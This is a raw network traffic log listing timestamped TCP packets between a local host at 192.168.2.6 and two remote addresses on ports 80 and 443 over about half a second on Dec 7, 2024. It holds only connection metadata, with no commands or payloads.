Dec 7, 2024 10:51:51.429892063 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.452075005 CET	443	49832	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:51.452685118 CET	49832	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:51.452702999 CET	443	49832	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:51.453216076 CET	49832	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:51.453229904 CET	443	49832	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:51.480664968 CET	443	49829	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:51.481301069 CET	49829	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:51.481314898 CET	443	49829	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:51.481908083 CET	49829	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:51.481911898 CET	443	49829	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:51.541157007 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.541215897 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.541299105 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.541379929 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.541614056 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.541662931 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.541729927 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.541768074 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.542470932 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.542530060 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.542645931 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.542766094 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.543385983 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.543447971 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.543507099 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.543590069 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.544285059 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.544326067 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.544368982 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.544518948 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.545202971 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.545243025 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.545322895 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.545465946 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.546103954 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.546210051 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.546216965 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.546286106 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.547061920 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.547122002 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.547348022 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.547401905 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.547899008 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.547935009 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.547967911 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.547982931 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.548801899 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.548898935 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.548933983 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.548974037 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.549731016 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.549782991 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.549822092 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.549855947 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.550621986 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.550728083 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.550748110 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.550777912 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.551554918 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.551600933 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.551659107 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.551788092 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.552447081 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.552495956 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.552591085 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.552625895 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.553366899 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.553468943 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.553512096 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.554245949 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.554291964 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.554357052 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.554423094 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.555159092 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.555248976 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.555298090 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.555463076 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.589545965 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.589584112 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.589607954 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.589643955 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.589901924 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.589999914 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.590059042 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.590150118 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.590151072 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.590219021 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.590975046 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.591023922 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.591062069 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.591099977 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.591885090 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.591943979 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.591980934 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.592139959 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.592781067 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.592833996 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.592875004 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.592957020 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.593672991 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.593725920 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.593769073 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.593815088 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.594599962 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.594671965 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.594750881 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.594790936 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.595489979 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.595555067 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.595597982 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.595642090 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.596415997 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.596465111 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.596541882 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.596610069 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.597460032 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.597502947 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.597590923 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.597634077 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.598252058 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.598313093 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.598347902 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.598742008 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.599139929 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.599194050 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.599234104 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.599267960 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.600032091 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.600085974 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.600136995 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.600182056 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.600931883 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.601020098 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.601022959 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.601061106 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.601860046 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.601974010 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.602004051 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.602004051 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.602755070 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.602809906 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.602891922 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.602933884 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.603657961 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.603710890 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.603763103 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.603804111 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.604597092 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.604712963 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.604754925 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.604794025 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.605549097 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.605628014 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.605654955 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.605714083 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.606470108 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.606573105 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.606590986 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.606736898 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.607331038 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.607430935 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.607466936 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.607669115 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.608299971 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.608396053 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.608481884 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.608534098 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.609146118 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.609190941 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.609252930 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.609301090 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.610075951 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.610152006 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.610177994 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.610196114 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.611066103 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.611119032 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.611213923 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.611260891 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.611917019 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.611984015 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.612011909 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.612143993 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.612740040 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.612782955 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.612859011 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.612948895 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.613869905 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.613914013 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.613985062 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.614156961 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.614770889 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.614825010 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.614891052 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.614928007 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.615544081 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.615586042 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.615645885 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.615681887 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.616476059 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.616518021 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.616527081 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.616563082 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.617379904 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.617425919 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.617530107 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.617579937 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.618185997 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.618300915 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.618345976 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.619090080 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.619144917 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.619259119 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.619319916 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.619952917 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.620008945 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.620094061 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.620158911 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.620920897 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.620980978 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.621010065 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.621049881 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.621783972 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.621830940 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.642467022 CET	443	49831	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:51.642503977 CET	443	49830	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:51.643140078 CET	49831	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:51.643146038 CET	49830	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:51.643163919 CET	443	49831	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:51.643172026 CET	443	49830	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:51.643814087 CET	49830	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:51.643819094 CET	443	49830	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:51.644021034 CET	49831	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:51.644027948 CET	443	49831	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:51.645011902 CET	443	49833	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:51.645580053 CET	49833	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:51.645610094 CET	443	49833	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:51.645992041 CET	49833	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:51.645998955 CET	443	49833	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:51.734127998 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.734147072 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.734210968 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.734517097 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.734574080 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.734616041 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.734658957 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.735249043 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.735356092 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.735369921 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.735388994 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.736166954 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.736222982 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.736296892 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.736337900 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.737102985 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.737164021 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.737212896 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.737273932 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.738145113 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.738193035 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.738229990 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.738269091 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.739038944 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.739061117 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.739084005 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.739101887 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.739782095 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.739828110 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.739988089 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.740108967 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.740705013 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.740762949 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.740839005 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.740890980 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.741578102 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.741631985 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.741688013 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.741753101 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.742481947 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.742527962 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.742569923 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.742685080 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.743376017 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.743421078 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.743486881 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.743529081 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.744298935 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.744384050 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.744468927 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.744523048 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.745207071 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.745313883 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.745331049 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.745349884 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.746107101 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.746150970 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.746196032 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.746241093 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.747009039 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.747051001 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.747117996 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.747148991 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.747908115 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.747975111 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.747980118 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.748013973 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.782109022 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.782193899 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.782223940 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.782258034 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.782533884 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.782596111 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.782644033 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.782677889 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.783432007 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.783487082 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.783534050 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.783571005 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.784399033 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.784439087 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.784482956 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.785252094 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.785293102 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.785320997 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.785357952 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.786165953 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.786209106 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.786267996 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.786305904 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.787081957 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.787125111 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.787132978 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.787166119 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.787980080 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.788022995 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.788136005 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.788923025 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.788970947 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.789052963 CET	80	49808	185.215.113.206	192.168.2.6
